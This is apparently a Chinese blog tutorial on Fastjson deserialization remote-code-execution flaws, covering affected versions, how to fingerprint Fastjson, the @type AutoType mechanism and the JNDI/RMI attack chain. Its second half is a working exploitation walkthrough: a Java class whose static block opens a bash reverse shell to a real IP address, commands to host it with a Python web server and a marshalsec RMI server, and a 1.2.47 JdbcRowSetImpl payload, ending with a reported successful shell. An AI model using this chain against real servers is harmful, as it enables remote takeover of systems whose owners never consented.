赞
踩
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。
举个简单的例子如下:
{
"name":"BossFrank",
"age":23,
"media":["CSDN","bilibili","Github"]
}
json本质就是一种字符串,用于信息的存储和交换。
------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
------ 它采用一种“假定有序快速匹配”的算法,把 JSON Parse 的性能提升到极致,是目前 Java 语言中最快的 JSON 库,并且它不依赖于其它任何库。Fastjson已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。
Fastjson <=1.2.24 反序列化远程命令执行漏洞
Fastjson <=1.2.41 反序列化远程命令执行漏洞
Fastjson <=1.2.42 反序列化远程命令执行漏洞
Fastjson <=1.2.43 反序列化远程命令执行漏洞
Fastjson <=1.2.45 反序列化远程命令执行漏洞
Fastjson <=1.2.47 反序列化远程命令执行漏洞
Fastjson <=1.2.62 反序列化远程命令执行漏洞
Fastjson <=1.2.66 反序列化远程命令执行漏洞
在请求包里面有json格式的,就极有可能使用了Fastjson,如下图
fastjson的作用是用于对JSON格式的数据进行解析和打包,所以出现json格式的地方就有可能使用了
将请求方式改成post请求,再将content-type 请求头修改为application/json 后发送,让其报错,报错信息中会显示fastjson字眼的。
------ 当一个类只有一个接口的时候,将这个类的对象序列化的时候,就会将子类抹去(apple/iphone)只保留接口的类型(Fruit),最后导致反序列化时无法得到原始类型。本例中,将两个json再反序列化生成java对象的时候,无法区分原始类是apple还是iphone。
------ 为了解决上述问题: fastjson引入了基于属性(AutoType),即在序列化的时候,先把原始类型记录下来,使用@type
的键记录原始类型。
------ 在本例中,
------ 这样在反序列化的时候就可以区分原始的类了。
------ 使用AutoType功能进行序列化的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。
------ FastJSON在反序列化时,可能会将目标类的构造函数、getter方法、setter方法、is方法执行一遍,如果此时这四个方法中有危险操作,则会导致反序列化漏洞,也就是说攻击者传入的序列化数据中需要目标类的这些方法中要存在漏洞才能触发。
------ 攻击者准备rmi服务
和web服务
,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE。
常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl,其中有个dataSourceName方法支持传入一个rmi的源
,只要解析其中的url就会支持远程调用!
获取一个临时域名
构造POC发送
返回DNSlog查看
首先存在一个Exp.java的恶意文件,需要将其编译成class文件
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/119.91.209.244/9090 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
然后使用javac编译成Exp.class,命令是:javac Exp.java
使用python开启web服务,端口是9100
python3 -m http.server 9100
或
python -m SimpleHTTPServer 9100
命令是:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://119.91.209.244:9100/#Exp" 9299
这里的端口是恶意文件里面写的反弹端口,这里就是9090
1.2.47的POC:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.179.128:9999/TouchFile",
"autoCommit":true
}
}
这里就成功反弹shell了。
------ Fastjson反弹shell操作和Log4j2反弹shell的操作类似,都是第2、3、4、5步都是在攻击者端操作,只有第6步是在普通前端操作。只不过一个开启的是ldap服务,另一个开启的是rmi服务。
------ 上面第6步使用的POC是对应1.2.47版本的POC,不同版本的POC是不同的。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。